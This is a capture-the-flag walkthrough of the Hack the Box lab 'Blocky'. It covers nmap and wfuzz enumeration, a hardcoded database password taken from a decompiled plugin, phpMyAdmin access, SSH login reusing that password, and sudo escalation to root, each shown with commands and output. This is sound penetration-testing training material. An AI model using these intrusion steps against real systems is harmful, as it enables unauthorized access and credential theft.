Today we are going to solve another CTF challenge “Blocky ” which is available online for those who want to increase their skill penetration testing and black box testing. Blocky is a retried vulnerable lab presented by Hack the Box
Level : Easy
Since these labs are online available therefore they have static IP and IP of blocky is 10.10.10.37 so let’s begin with nmap port enumeration.
c:\Users\jacco>nmap -sC -sV 10.10.10.37 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 19:50 W. Europe Summer Time Nmap scan report for 10.10.10.37 Host is up (0.030s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA) | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA) |_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 4.8 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: BlockyCraft – Under Construction! 8192/tcp closed sophos Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.67 seconds
Knowing port 80 is open in victim’s network I opened it’s IP in the browser but didn’t get any remarkable clue on its welcome page.
Next, we use wfuzz to enumerate the directories and found some important directories such as /phpmyadmin, /wp-admin, /plugin/files and etc which you can confirm from below image.
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.37/FUZZ ******************************************************** * Wfuzz 2.3.4 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.37/FUZZ Total requests: 220551 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000003: C=200 313 L 3592 W 52256 Ch "# Copyright 2007 James Fisher" 000004: C=200 313 L 3592 W 52256 Ch "#" 000001: C=200 313 L 3592 W 52256 Ch "# directory-list-2.3-medium.txt" 000002: C=200 313 L 3592 W 52256 Ch "#" 000005: C=200 313 L 3592 W 52256 Ch "" 000181: C=301 9 L 28 W 309 Ch "wiki" 000232: C=301 9 L 28 W 315 Ch "wp-content" 000510: C=301 9 L 28 W 312 Ch "plugins" 000777: C=301 9 L 28 W 316 Ch "wp-includes" 001064: C=301 9 L 28 W 315 Ch "javascript" 007171: C=301 9 L 28 W 313 Ch "wp-admin" 010816: C=301 9 L 28 W 315 Ch "phpmyadmin" 013818: C=404
package com.myfirstplugin; public class BlockyCore { public String sqlHost = "localhost"; public String sqlUser = "root"; public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22"; public BlockyCore() {} public void onServerStart() {} public void onServerStop() {} public void onPlayerJoin() { sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!"); } public void sendMessage(String username, String message) {} }
Then I explore http://10.10.10.37/phpmyadmin and login into phpmyadmin server using above credential
Then opened the WordPress database for stealing username from here and I found a user login: Notch with user Id 1.
Now I try to access victim’s system shell through SSH
PS C:\Users\jacco> ssh notch@10.10.10.37 notch@10.10.10.37's password:8YsqfCTnvxAUeduzjNSXe22 Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 7 packages can be updated. 7 updates are security updates. Last login: Sun Dec 24 09:34:35 2017 notch@Blocky:~$ cat user.txt 59f*****3cd5 notch@Blocky:~$ sudo -l [sudo] password for notch:8YsqfCTnvxAUeduzjNSXe22 Matching Defaults entries for notch on Blocky: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User notch may run the following commands on Blocky: (ALL : ALL) ALL notch@Blocky:~$ sudo su root@Blocky:/home/notch# cd .. root@Blocky:/home# cd .. root@Blocky:/# cd root root@Blocky:~# ls root.txt root@Blocky:~# cat root.txt 0a9*****cd5f
Author: Jacco Straathof